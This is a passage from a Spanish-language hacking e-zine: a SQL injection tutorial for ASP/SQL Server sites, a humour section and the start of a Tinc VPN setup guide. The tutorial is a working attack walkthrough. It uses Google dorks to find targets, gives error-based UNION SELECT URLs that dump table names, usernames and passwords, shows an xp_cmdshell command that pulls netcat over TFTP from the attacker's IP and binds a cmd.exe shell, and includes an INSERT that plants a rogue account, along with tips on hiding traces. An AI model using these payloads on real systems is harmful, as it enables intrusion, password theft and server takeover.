hacker que de script kiddie: la consecucin mediante queries del contenido de todas las tablas del
sistema, y ms concretamente de los users y los passes.

Que nece s i ta m o s saber:

Toda autenticacin mediante user y pass hecha contra una base de datos consiste en un select de ese
user y ese pass como valores en una tabla determinada, esto quiere decir algo as:
SELECT Password FROM Login WHERE Username='loquelemetas'

| U se r n a me | Password |
:----------------------------------:
| Se r gio | Th4Nx |
| a d min. | S3nT7n3L |
'-----------------------------------'

En la query anterior, busca Password (que sera lo que t le metieras) en la tabla Login (la tabla
dibujada ms arriba) donde el Username sera el que t le metieras. Si traducimos esto a un caso
prctico:

SELECT 'Th4Nx' FROM Login WHERE Username='Sergio'

Y entonces compara con el Password que le hemos introducido. Si el Password fuera efectivamente
'Th4Nx', nos fijamos en la tabla, y el Password que corresponde a la fila Sergio se corresponde con el
que le hemos introducido, con lo cual nos permitira el acceso. Muchos de los sistemas de entrada sin
necesidad de Password se basan en la estructur a de esa query y de cmo interpreta el servidor de bases
de datos esa query. El truco en ese caso (aunque para cumplir los objetivos de este tutorial no sea
necesario conocerlo realmente) se basa en esa comilla y en que le podemos pasar querys como valores.
Esto es :

SELECT 'Niidea' or 1=1 FROM Login WHERE Username='Admin' or 1=1

La autenticacin se basa en que tanto el Username como el Password devuelvan un 1 lgico. Es


sencillo: si encuentra el Username es un 1 lgico y si el Password se corresponde es el otro 1 lgico. El
truco est en forzar ese 1 lgico y eso lo conseguimos mediante ese OR, ya que, siempre 1=1. Esto
tambin ocurre algunas veces con el Username, en esos casos nos podemos ver dentro habiendo entrado
como el primer usuario de la tabla. Si ese usuario no tiene privilegios, nosotros tampoco los tendemos.

Tenemos otra posibilidad, que radica en la forma de interpreta r los signos "--" (dos signos de menos,
seguidos) de la BD (base de datos). sta omite todo lo que viene a continuacin, de esta forma nos
encontramos que introduciendo como Username: 'Admin'- - y sin contrasea, obtenemos la siguiente
query:

SELECT password FROM login WHERE Username='Admin'

Si la pgina es vulnerable, nos encontramos con que omite toda comprobacin posterior a los signos - y
nos da acceso siempre que exista el usuario admin. Es otra forma curiosa de obtener acceso como
administrador, pero en esta dependemos de que el nombre de usuario del administrador sea ese y que
no hayan cerrado este mtodo de entrada.

Sigamos...

Una vez dentro, existe una tabla maestra que contiene el nombre de todas las tablas del sistema, ser
la tabla que consultaremos para dar con el nombre de la tabla dnde se guardan los Username y
Password de la gente. Se llama Information.Schema (El ltimo link de arriba nos muestra su
estructura y podemos seguir mediante los links de la derecha la estructura de cada una de sus
columnas, que a su vez son tablas), en ella consultaremos tanto los nombre de las tablas como el

Nombre de sus columnas para poder realizar las consultas que nos devuelvan los Usernames y
Passwords. Como se puede observar, nos pasearemos tan tranquilamente por las tablas de toda la base
de datos (Nota: No aceptamos Drop Table como query.).

Manos a la obra:

Empecemos localizando una pgina web que corra una BD SQL Server y que realice las consultas
mediante ASP. En los 3 casos no citar los nombres correctos de las pginas para evitar un posible
crackeo de las mismas, ya que, como bien es sabido, el robo de nombres de usuario y contraseas es
delito, y el autor de este tutorial no quiere responsabilizarse de un mal uso de estos conocimientos al
haber dejado l mismo un log del tamao de varios tomos de la La Larousse en versin extendida.

En mi caso tratar 3 pginas, ya que cada una tiene caractersticas propias que enriquecern el
conjunto:

Empezaremos yendo al google y escribiendo como bsqueda:


"Algo.asp?find=5" Y vamos probando, por ejemplo en una de ellas:

http://www.pagina3.org

En primer lugar empezaremos por saber si est corriendo una base de datos (muy probablemente) y si
sta es vulnerable. Lo haremos de una forma muy sencilla. Comprobaremos mediante el ejercicio que
propone el primer link del apartado fuentes la base de datos que corre y si sta es vulnerable. Para ello
buscamos dentro de los links de la pgina un link que nos conduzca hasta un ASP al que se le pase un
valor numrico. El mismo caso que en la bsqueda en el google. En este caso tengo un ASP al que se le
pasa lo siguiente: uid=58. Y procedemos a sustituir eso en la barra de direcciones del navegador por
uid='58. y sorprendentemente obtenemos el siguiente error:

Microsoft OLE DB Provider for SQL Server error '80040e14'


Unclosed quotation mark before the character string '58'.

De lo que podemos deducir que corre un sql server y que es vulnerable a la inyeccin de cdigo. Esto
sucede porque hemos hecho la siguiente consulta:

SELECT valor FROM tabla WHERE uid=''58'

Si nos fijamos, la comilla que hemos puesto es la que est a la izquierda del 5 y se queja de que hay una
comilla sin cerrar. Eso quiere decir que podemos meterle cdigo mediante los valores que le pasamos a
un ASP, que ser interpretado por el servidor de base de datos y que nos devolver un resultado igual
que nos lo devuelve en el caso de una consulta correcta al consultar la pgina web de forma normal.

Llegados a este punto, nos aprovecharemos de una vulnerabilidad de SQL Server.

Dicha vulnerabilidad se basa en la imposibilidad de realizar una conversin del tipo string al tipo
integer. La primera forma que probaremos, ser usando la funcin unin, para la cual le pasaremos
como valores un integer y un string, forzando al error. El truco est en que nos debiera devolver el
string como parte del error... y si el string fuera el resultado de un select? Jejejejeje.

Para ello introducimos la siguiente URL:

http://www.pagina3.org/elasp.asp?uid=58%20UNION%20SELECT%20TOP%201%20table_name%
20FROM%20information_schema.tables

Obtenemos el siguiente error:

Microsoft OLE DB Provider for SQL Server error '80040e07'


Syntax error converting the nvarchar value 'REFERENTIAL_CONSTRAINTS' to a column of data
type int.

Efectivamente nos ha devuelto el string y como en este caso el string es el resultado de una query,
obtenemos que el primer valor de table_name es Referential_Constraints. Eso quiere decir que el
nombre de la primera tabla de la base de datos es Referential_Constraints. Cual ser el de la
segunda?, ya que estamos... Cual es el nombre de la tabla que guarda los Usernames y los
Passwords?, preguntemos pues.

http://www.pagina3.org/elasp.asp?uid=58%20UNION%20SELECT%20TOP%201%20table_n
ame%20FROM%20information_schema.tables%20where%20table_name%20not%20in%20
('referential_constraints')
(Nota: todo esto no es case sensitive, a no ser que lo sea el Username y el Password) De esta manera
obtenemos el nombre de la primera tabla que no sea la que nos ha mostrado antes:

Microsoft OLE DB Provider for SQL Server error '80040e07'


Syntax error converting the nvarchar value 'dtproperties' to a column of data type int.

Y as vamos aadiendo cada una de las que nos muestre para obtener la siguiente:

http://www.pagina3.org/elasp.asp?uid=58%20UNION%20SELECT%20TOP%201%20table_n
ame%20FROM%20information_schema.tables%20where%20table_name%20not%20in%20

('referential_constraints','dtproperties')
Y obtenemos la siguiente:

Microsoft OLE DB Provider for SQL Server error '80040e07'


Syntax error converting the nvarchar value 'sysalterna tes' to a column of data type int

Todo esto sera lindo, pero hay varios casos en los que no funciona:

Tomamos otro link diferente de la pgina 3 y probamos lo del UNION SELECT:

http://www.pagina3.org/otroasp.asp?uid=29%20union%20select%20table_name%20from
%20information_schema.tables

Obtenemos el siguiente error:

Microsoft OLE DB Provider for SQL Server error '80040e14' Incorrect syntax near the keyword 'by'.

A simple vista nos podemos creer que la web nos est insultando (es algo as en realidad), pero si
usamos un poco la imaginacin vemos lo que nos est queriendo decir: el query que nosotros queremos
realizar acaba en la palabra tables, pero para la pgina web, esa query tiene ms parmetros que los
que vemos en la barra de direcciones y muy probablemente, despus del id=29 la query seguira con un
"by". Qu quiere decir eso?, que para inyectar ah necesitaramos, o bien decirle que omita todo lo que
va despus del uid=29, o buscarnos otro ASP que no tenga ms parmetros que los que vemos (como en
el primer ASP que probamos en pgina 3). Un truco que tenemos para decirle que omita todo lo que va
despus del uid=29 (sin omitir nuestra query claro est) es acabar nuestra query con un WHERE 1=1.
Esto hace que directamente sean correctos todos los argumentos de despus y que no vemos.

Probemos:

http://www.pagina3.org/otroasp.asp?uid=29%20union%20select%20table_name%20from
%20information_schema%20tables%20where%201=1

Microsoft OLE DB Provider for SQL Server error '80040e14' All queries in an SQL statement
containing a UNION operator must have an equal number of expressions in their target lists.

Y aqu tenemos otro de los errores tpicos (s, nos sigue insultando pero todava nos podemos
rebotarnos), si consultamos el pdf de la seccin de fuentes podemos encontrar que este error nos
indicaque nuestro UNION SELECT necesita el mismo numero de campos que la query original. Si la
query original buscaba implcitamente nombre, sexo, edad, altura, al buscar nosotros simplemente
table_name, estamos omitiendo el resto de campos, as que procedemos a aadir campos hasta que deje
de pedrtelos:

http://www.pagina3.org/otroasp.asp?uid=29union%20select%20table_name,table_name%
20from%20information_schema.tables%20where%201=1

Microsoft OLE DB Provider for SQL Server error '80040e14'


All queries in an SQL statement containing a UNION operator must have an equal number of
expressions in their target lists
Sigue en sus 13. Tal vez sean ms campos los que pide... al cabo de un rato y de esta URL
(copio literal el trozo de los campos), conseguimos acceder al nombre de la tabla:

http://www.pagina3.org/maldito.asp?uid=29%20union%20select%20table_name,table_na
me,table_name,table_name,table_name,table_name,table_name,table_name,table_name%
20from%20information_schema.tables%20where%201=1

Microsoft OLE DB Provider for SQL Server error '80040e07'


Syntax error converting the nvarchar value 'dtproperties' to a column of data type int.

En este caso, al no mencionar el TOP 1, nos ha devuelto un valor que no sabemos si es el primero o el
ltimo o uno a random.

Debo mencionar antes de seguir, un caso curioso. Probando este mismo mtodo de la primera parte,
tuve que hacerme valer de una amiga para que ella fuera probando los nmeros pares de campos y yo
los impares... lo dejamos cuando ambos llegamos a 100 y 101 campos respectivamente. Mi consejo es
que consultas de 50 campos nos son imposibles pero s improbables. Si puedes bscate un ASP donde
puedas inyectar tranquilamente sin estos problemas. Pero como dice un buen amigo mo... poda ser
peor.

http://pagina1.com/un.asp?id=69%20union%20select%20table_name,table_name%20from
%20information_schema.tables%20where%201=1

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]No se permite la conversin implcita del tipo de
datos nvarchar a money. Utilice la funcin CONVERT para ejecutar esta consulta.

Vale, si antes no pillabas lo de que la pgina te insultara, ahora seguro que lo has pillado. Nos
encontramos ante lo que parece un muro insalvable: la conversin de tipos que nos da toda la
informacin est deshabilitada (!!!!!!!). Pero ante todo debemos recordar lo que nos est diciendo
continuamente: Soy vulnerable, soy vulnerable...

Una posible solucin sera reemplazar uno de los contenidos que te muestra la web por una consulta de
lo que quieres. Es una idea, pero no tienes tampoco acceso al nombre de las tablas. Es entonces cuando
surge la idea feliz, que nada tiene que ver con todo esto. Si podemos pasar el UNION SELECT, quiere
decir que el valor que le pasamos a una de las variables del ASP podra ser una query directamente...
probemos pues. Tras una larga caminata por la web, y omitiendo mofas por parte de la pgina contra el
que esto escribe, nos topamos con esta URL:

http://pagina1.com/otro.asp?N=1&counter=9999999&inickname=algo

De aqu sacamos que counter ha de ser un integer... y si hacemos que sea un string y ese
string sea el resultado de una query?, ando flipando o de tanto delirar he dado con algo
guapo?, probemos:

http://pagina1.com/otro.asp?N=1&counter=(select%20top%201%20table_name%20from%
20information_schema.tables)&inickname=algo

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'


[Microsoft][ODBC SQL Server Driver][SQL Server]Error de sintaxis al convertir el valor nvarchar
'REFERENTIAL_CONSTRAINTS' para una columna de tipo de datos int.

JAJAJAJAAJAJJA, y deca que tena deshabilitada la conversin de tipos. Ahora ya podemos pasar a
buscar la tabla que nos muestre los Usernames y Passwords, para ello volver a manos a la obra que es
ms simple en construccin y citar al comienzo como mera ancdota y buen consejo.

Ahora hemos de echar mano a la tabla Information_Schema. Sabemos que podemos tener el nombre de
todas las tablas con lo que asumiremos que tenemos una tabla llamada TblUsers (que existe en manos
a la obra de hecho). Pero para poder hacerle un select necesitamos como mnimo el nombre de una de
sus columnas. Si seguimos el primero de nuestros links podemos observar que la tabla
information_schema tiene una de sus columnas llamada columns y que sta a su vez tiene una
columna llamada table_name.Con un poquito de imaginacin podemos construir la query.

http://www.pagina3.org/elaspdesiempre.asp?id=23%20union%20select%20top%201%20co
lumn_name%20from%20information_schema.columns%20where%20table_name='TblUsers

Microsoft OLE DB Provider for SQL Server error '80040e07'


Syntax error converting the nvarchar value 'PersonID' to a column of data type int.

Eso nos devuelve la primera columna de la tabla TblUsers. Repetimos el proceso de antes aadiendo
que no nos muestre las que ya nos ha mostrado hasta que llegamos a las columnas de Username y
Password, y entonces ya solo la query final.

http://www.pagina3.org/eseasp.asp?id=23%20union%20select%20top%201%20username
%20from%20tblUsers

Repetimos el proceso para todos los Usernames, hasta que encontramos un Username admin o algo
parecido, y si no, pues comprobamos los privilegios de cada uno. Es engorroso pero ms no podemos
pedir, adems, siempre hace gracia ver los pass de la gente, que se cree que por poner nmeros y letras
son completamente inviolables.

http://www.pagina3.org/elasp.asp?id=23%20union%20select%20password%20from%20tbl
Users%20where%20username='admin'

En este caso 'admin' no existe pero el paso final sera ese. La ancdota de la semana, y creo que es una
buena enseanza, es que en la primera parte, la columna de Username y la de Password se hallaban
en la posicin 35 y 36 respectivamente en la tabla. Sugiero usar la orden LIKE para gente impaciente,
aunque nunca cabe descartar el cambio de nombre a dichas columnas por lo que podra inducir a
errores.

Una vez con el pass del admin, solo nos queda el peldao de encima: el control sobre la mquina. Citar
el modus operandi ya que un servidor (el que esto escribe) no ha conseguido hacerlo rular, ms que
nada porque la mayora de las pginas tienen cribada la concatenacin de sentencias mediante el ; o
bien no tienen los permisos necesarios para la ejecucin de cdigo. Me estoy refiriendo a los
procedimientos almacenados. Con ellos y , todo sea dicho los permisos necesarios, podemos ejecutar
cdigo arbitra rio en la mquina objetivo. Cito a continuacin las sentencias con las cuales se puede
obtener un netcat limpiecito en el Server.

Algo.asp?id=25 exec master..xp_cmdshell 'tftp+"-


i"+TU.IP.VA.AQU+GET+netcat.exe+C: \inetpub \ sc ripts \ n c.exe

Lo activamos :

Algo.asp?id=25 exec master..xp_cmdshell 'C:\Inetpub \ sc ripts \ n c -v -v -L -d e cmd.exe -p 6200'

Ya conectarnos.

Para aquellos que prefieran troyanizar el sistema, tambin tenemos a nuestra disposicin una amplia
coleccin de procedimientos almacenados. Si alguien recuerda lo engorroso del Unicode, pues nada,
aqu simplemente vamos al grano, directorios, archivos, registro, etc...

http://www.sql- server- performance.com/ac_extended_stored_procedures.asp

El nico problema que tiene todo esto de los procedimientos, son los permisos con los que corre el web
user. Por lo que se suele desencadenar en el siguiente pantallazo:

Microsoft OLE DB Provider for ODBC Drivers error '80004005'


[Microsoft][ODBC SQL Server Driver][SQL Server]EXECUTE permission denied on object
'xp_cmdshell', database 'master', owner 'dbo'.

Excepc io n e s:

Si los pass que queremos sacar de la base de datos son numricos, al hacer el UNION no generar n
errores, con lo cual no los podremos ver. El truco consiste en hacerlos strings jejeje. A eso vamos.

La forma ms sencilla es agregar un string al pass en cuestin, para que al leerlo lo lea como un string.
Es un simple convert :

http://algo/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20aadido')


FROM admin_login where login_name='user'

Asumiendo lo siguiente:
Username = user ; Password = 666
Obtenemos lo siguiente:
Username = user ; Password = 666aadido
Con lo cual al leer el pass, ya nos lo da, si queremos no dejar huellas ser mejor que
restablezcamos el pass una vez lo hayamos cambiado... o tal vez queris cambiarle el pass al admin

jejejeje. Eso ya os lo dejo a vosotros. Para los que queris, haceros una cuenta en el sistema, os dejo la
siguiente URL:

http://URL/find.asp?id=10; INSERT INTO 'tblUser' ('login_id', 'login_name','password',


'details') VALUES (666,'userna me','newpas5','NA')-
Relajando la neura
Por bitburn er
Mail de contact o:

Bienvenidos de nuevo a la seccin destinada para hacer un alto entre tanto tema interesante.. jeje, la
historia de la edicin es el que viene despus de esta introduccin: Paranoia por Holiday, mas corto de
lo que fue el de la anterior edicin. Como nico articulo mio y oportunidad de hablar xDD.

Paran oi a por Holiday:

Si recibes un mensaje de correo con el titulo "HOLIDAY" BORRALO INMEDIATAMENTE! Se trata


de un nuevo y revolucionario tipo de virus que se transmite por correo electronico. En el momento de
abrir el mensaje se activara, y NO IMPORTA QUE SISTEMA OPERATIVO O HARDWARE USES,
comenzara a funcionar:

HOLIDAY borrara todo tu disco duro. Y no solo eso, sino que tambin revolver todos los datos de
cualquier disquete cercano a tu ordenador. Pondr los controles de fri de tu nevera para que todos tus
helados se fundan. Desmagnetizara las bandas de todas tus tarjetas de crdito, fastidiara el
tracking de tu video y usara armnicos de campo subespacial para araar todos los CDs que intentes
or.

Dar tu nuevo numero de telfono a tu ex-novia. Echara gel de bao en tu pecera. Se beber toda tu
cerveza y dejara sus calcetines en la mesa de caf cuando esperes visitas. Pondr un gatito muerto en
el bolsillo trasero de tus pantalones de vestir y te esconder las llaves del coche cuando llegues tarde
al trabajo.

HOLIDAY har que te enamores de un pingino. Te provocara pesadillas sobre enanos de circo. Pondr
azcar en el deposito de la gasolina y te afeitara las dos cejas a la vez que sale con tu novia actual a tus
espaldas, cargando la cuenta de la cena y la habitacin del hotel a tu Viza.

Seducir a tu abuela. No importa si esta muerta, es tal el poder de HOLIDAY que alcanza mas all de
la tumba para fastidiar a las cosas que mas queremos.

Cambiara tu coche de plaza de parking aleatoriamente para que no lo encuentres. Pateara a tu perro.
Dejara mensajes calentones en el buzn de voz de tu jefe, con tu voz. Es insidioso y sutil. Es peligroso y
aterra el contemplarlo. Es tambin una mas bien interesante sombra de color malva.

HOLIDAY te pegara la sifilis. Dejara la tapa del water levantada. Sintetizara unos gramos de
Metanfetamina en tu baera y llamara a la polica, y dejara tocino cocindose en la estufa mientras
que sale a cazar estudiantes con tu nuevo quitanieves.

Esos son solo unos pocos sntomas. !Se cuidadoso!

Linu x sesual

Extrado de escomposlinux seccin humor

# man; X; X; X; unzip; strip; touch; finger; mount; fsck; more; yes; umount
# at now +1 hour
# unzip; strip; touch; finger; mount; fsck; more; yes; umount
# sleep

Consult a medica

Un viejo de ochenta aos va al medico a pregunta rle si puede tener hijos con su esposa de setenta, y el
mdico le da un tarrito y le dice que le traiga al da siguiente una muestra de semen. Cuando vuelve:
Doctor, doctor, que no he podido traerle la muestra de semen.
Vaya... como lo ha intentado?
Primero con la mano derecha, despus con la izquierda; luego lo intent mi esposa, primero con las
dos manos y luego con los dientes, pero no hubo manera, no hemos conseguido abrir el tarrito...

Windo ws 69

Windows69: 6 veces mas grfico, 9 veces peor o Traje de payaso para DOS

Requisitos Windows69:

Pc con procesador Intel de hace 2 meses


Sonido de 192000khz con equipo 5.1 y sb audigy o compatible
Video suficiente para que el sistema juegue CounterStrike mientras usted trabaja (recuerde que le
gustan los buenos grficos)
Disco Duro grande... muy grande...
Teclado, Mouse, mantenimiento microsoft
Pc armado en compaia que no arme pcs linux (puede causar incompatibilidades)
Licencia original windows, no cause que bill llore
Rellenar IDEs con unidades, podria entrar interferencia en los agujeros y hacer caer el sistema
Botones reset a gusto
Creer que windows merece ser un sistema operativo

Para reproducir ding.wav, nuevas caracteristicas:

Soporte Multitarea, arruina mas cosas al mismo tiempo


Intuitivo, 40mb de ayuda
Nuevo look, cae mas rapido

Errores entendibles
Ya no lo llenaremos de mensajes que no entendera, o codigos que no sabra de que son, ahora leera
mensajes como "Perdoname, tengo que hacer un volcado de pila al sector 1534 (2100045x057) y luego
reiniciar, tu compra un producto microsoft, o quieres que mate tu BIOS".

Nuevas interfaces
Mensajes tridimencionales de bienvenida que pueden tardar dias en iniciarse, menus con transiciones
que colapsan el sistema y arte bizarro para que pueda manejarse mejor por el sistema.

Nota: Windows69 puede causar errores en los antivirus, siempre escoja "ignorar", "cuarentena" es para
eliminar windows y "desinfectar" para eliminar su licencia.

Sea inteligente, lea la ayuda preparada por los ingenieros de microsoft, trae temas nuevos, desde como
cambiar la pila del raton optico, hasta guias de adoracion a bill.

Windows.. Hasta donde quisieras borrarme hoy?

Otra como tantas

Una noche, un pequeo avin estaba volando sobre Nueva Jersey con cinco pasajeros a bordo: el piloto,
Michael Jordan, Bill Gates, el Dalai Lama y un hippie. De repente, algo explot con fuerza en el
compartimento de quipaje, y el avin empez a llenarse de humo; la puerta de la cabina se abre y sale
el piloto:

"Caballeros, tengo buenas y malas noticias. Las malas noticias son que nos vamos a estrellar en
Nueva Jersey. Las buenas son que hay cuatro paracadas.. y yo tengo uno de ellos!"

El piloto abri la compuerta y salto. Michael Jordan se puso de pie un momento


"Seores, yo soy el mejor atleta del mundo. El mundo necesita tener grandes atletas. Creo que el
ms grande atleta del mundo merece tener un paracadas".

Dicho esto, tom uno de los paracadas restantes y salt. Bill Gates se puso de pie y dijo

"Caballeros, yo soy el hombre ms inteligente del mundo. El mundo necesita hombres inteligentes.
Creo que el hombre ms inteligente del mundo debe tener tambin un paracadas". Tom uno y
salt.

El Dalai Lama y el hippie se miraron el uno al otro. Finalmente el Dalai Lama habl:

"Hermano, he tenido una vida satisfactoria y he conocido la felicidad que da la iluminacin divina.
Ttienes toda la vida por delante. Toma el paracadas, yo caer con el avin".

El hippie sonri lentamente y dijo:

"No te preocupes, calvito. El hombre ms inteligente del mundo acaba de saltar con mi mochila".

Consult a medica II

Una mujer que va al ginecologo...

Doctor, doctor, vengo a que me revise.


Bien, desnudese y tindase all.
Aqu, al lado de la ma.

Escu elit a :P

Un estudiante de ingenieria en computacion ensea un programa al profesor y le pregunta:

Profesor, donde esta el error?, en que parte del codigo?

El profesor mira el programa, luego mira fijamente al estudiante, mueve la cabeza lentamente de
izquierda a derecha y dice:

En tu ADN

bitburner lets travel without moving


Tinc VPN How- To
Por ruc
Mail de contacto: [email protected]

ndice

1.0 .- Instalacin
2.1 .- Recompilando el Kernel
2.2 .- Terminando de preparar nos para instalar tinc
2.3 .- Otras cosas necesarias
2.4 .- Instalando tinc
3.0 .- Configuracin
3.1 .- Hosts y Keys
3.2 .- Tinc.conf
4.0 .- Arrancando tinc y ejemplo final
4.1 .- Ejemplo final

1.0 Introdu c c i n

Bueno en este documento voy a explicar como instalar una vpn, basada en GNU/Linux y Tinc, para
usar con amigos, conectarse a la oficina o lo que sea. Si hay errores o se dice alguna tonteria, sepan
disculpar =). En este documento no se explica como funciona una vpn o como funciona tinc, solo se
explica como instalarlo y configurarlo, para entender bien el funcionamiento de las vpns y de tinc les
recomiendo leer el manual oficial de tinc (en ingles):

http://tinc.nl.linux.org/documentation/tinc

En este caso en particular se usaron 3 computadoras conectadas a internet por cablemodem/dsl, las
mismas son:

Anita Debian Sid - 2.4.20


Phoenix Red Hat 8 - 2.4.18
Flor Debian Sid 2.4.20

Anita hace de servidor, y phoenix y flor se conectaran a ella, una vez establecidas las conexiones, las 3
maquinas podrn verse entre si a travs de nuestra vpn.

2.0 Instalaci n

Bueno vamos a preparar nuestr as maquinas para poder instalar tinc y crear nuestra vpn. En este
documento se asume que se tiene un manejo bsico de gnu/linux y un conocimiento bsico de redes.

Lo primero es preparar nuestro kernel para poder usar el tinc, vamos a usar el driver tun/tap, para
verificar si tenemos este driver en nuestro kernel podemos hacer:

~# modprobe tun

Para verificar que nuestro driver haya sido cargado con xito usamos "lsmod" que nos tendra que
devolver algo as:

:~# lsmod
Module Size Used by Tainted: PF

tun 4416 3 (autoclean)


nvidia 1545824 10
tulip 39840 1
cmpci 32356 0

Si vemos el modulo de tun significa que todo salio bien y podemos seguir con la instalacion de tinc, de
lo contrario tendremos que recompilar nuestro kernel.

2.1 Recom p il an d o el kern el

Esto es una tarea relativamente sencilla, solo deberemos agregar el driver de tun/tap a nuestro kernel
y recompilar de manera normal. Las cosas que deberemos agregar a nuestro kernel son:

Code maturity level options


[*] Prompt for development and/or incomplete code/drivers

Network device support


<M> Universal tun/tap device driver support

Luego recompilamos normalmente y verificamos como se explico antes que el driver funcione
correctamente.

2.2 Termi n a n d o de prep ararn o s para instal ar tinc

Bueno ya tenemos nuestro kernel preparado, ahora tenemos que verificar que el device de tun/tap este
creado o de lo contrario crearlo. Hacemos lo siguiente para ver si el device existe.

:~# ls -l /dev/net/tun
crw-r----- 1 root root 10, 200 Apr 5 06:02 /dev/net/tun
~#

:~# ls -l /dev/tun
crw-r----- 1 root root 10, 200 Apr 5 06:02 /dev/tun
:~#

Si ese device existe ya estamos casi listos para instalar tinc, de lo contrario debemos crearlo. En debian
si vamos a usar apt- get para instalar el tinc y el device no existe nos preguntar a si deseamos que el
instalador lo cree por nosotros, le decimos que si y listo. En otras distribuciones deberemos crearlo
nosotros, para esto vamos a usar el comando "mknod" de la siguiente manera:

:~# mknod -m 600 /dev/net/tun c 10 200

Con eso ya tenemos creado nuestro device y podemos continuar con la instalacin.

2.3 Otras cosas neces ari a s

Para que tinc funcione correctamente nuestro sistema tiene que tener instalado OpenSSL y Zlib, de lo
contrario cuando tratemos de compilar el tinc nos dar un error. Estos paquetes y sus instrucciones de
instalacin se pueden obtener en sus respectivas paginas:

OpenSSL : http://www.openssl.org/
Zlib : http://www.gzip.org/zlib/

Para debian podemos buscar los paquetes en: http://packages.debian.org/ o usando apt- get.

2.4 Instala n d o tinc

Podemos instalar tinc de varias maneras. Podemos optar por usar el source y compilarlo, el source lo
podemos obtener de la pgina oficial del tinc:
http://tinc.nl.linux.org/download.html

Tambin si usamos redhat podemos obtener los rpms en esa misma pagina, aunque no son la ultima
versin (los tinc a usarse en la vpn tienen que ser todos de la misma versin, no puede usarse por
ejemplo la versin 1.0pre7 en una maquina y la pre8 en otra maquina ya que no son compatibles).

Si usamos debian podemos obtener el paquete de tinc desde:

http://packages.debian.org/

O podemos usar apt- get de esta manera:

~# apt- get install tinc

Eso instalara tinc en nuestro sistema y lo dejara listo para configurar y usar.

Para compilar tinc vamos a usar la manera convencional, en el directorio donde descomprimimos el
source hacemos:

~# ./configure --prefix=/usr --with- openssl- dir=/usr/local/ssl with- openssl-


include=/usr/local/ssl/include --with- openssl- lib=/usr/local/ssl/lib

Explicacin del comando anterior:

--prefix=/usr

esto hace que tinc se instale en /usr

--with- openssl- dir=/usr/local/ssl


Esto le indica al script de configuracin donde encontrar openssl (solo es necesario si no lo encuentra
solo)

--with- openssl- include=/usr/local/ssl/include


Esto le indica al script de configuracin donde encontrar los headers de openssl (solo es necesario si no
los encuentr a solo)

--with- openssl- lib=/usr/local/ssl/lib


Esto le indica al script de configuracin donde encontrar las libreras de openssl (solo es necesario si no
las encuentr a solo)

~# make
(esto compilara el programa)

~# make install
(Esto instala el programa)

Si todo salio bien ya tenemos tinc instalado y podemos seguir con la configuracin.

3.0 Configurac i n

Ya tenemos tinc instalado y listo para configurar. Lo primero es explicar que tinc nos da la facilidad de
crear varias vpns, y darles un nombre a cada una, en este documento vamos a trabajar de esa manera,
nuestra red tendr el nombre "vpn", por eso todos nuestros archivos de configuracin se situara n en:

/etc/tinc/vpn/

O si instalamos tinc en "/usr/local/"

/usr/local/etc/tinc/vpn/
3.1 Hosts y Keys

Los archivos de los hosts contiene los datos de las maquinas que participara n de nuestra vpn y las
public keys, estos archivos de hosts estar n situados en:

/etc/tinc/vpn/hosts/

O si instalamos en "/usr/local/"

/usr/local/etc/tinc/vpn/hosts/

Estos archivos de los hosts tendrn nuestros datos de la siguiente manera:

Variable = valor

Nuestros archivos de hosts tendrn que estar en todas las maquinas de la vpn y tiene que existir uno
con los datos de cada maquina de la vpn, o sea que anita tendr los archivos hosts de ella misma, el de
phoenix y el de flor, phoenix tendr el de el, el de anita y el de flor, y flor tendr el suyo, el de anita y el
de phoenix, se entiende mas o menos? =).

Bueno nuestros archivos de host tienen el nombre de cada maquina, el de anita se llama
anita, el de phoenix, phoenix, y el de flor, flor. Estos archivos tienen las siguientes variables
adentro.

Address = 24.232.22.22
Esta variable tiene la ip de internet de la maquina.

Port = 655
Esta variable indica el puerto en que va a usar el tinc.

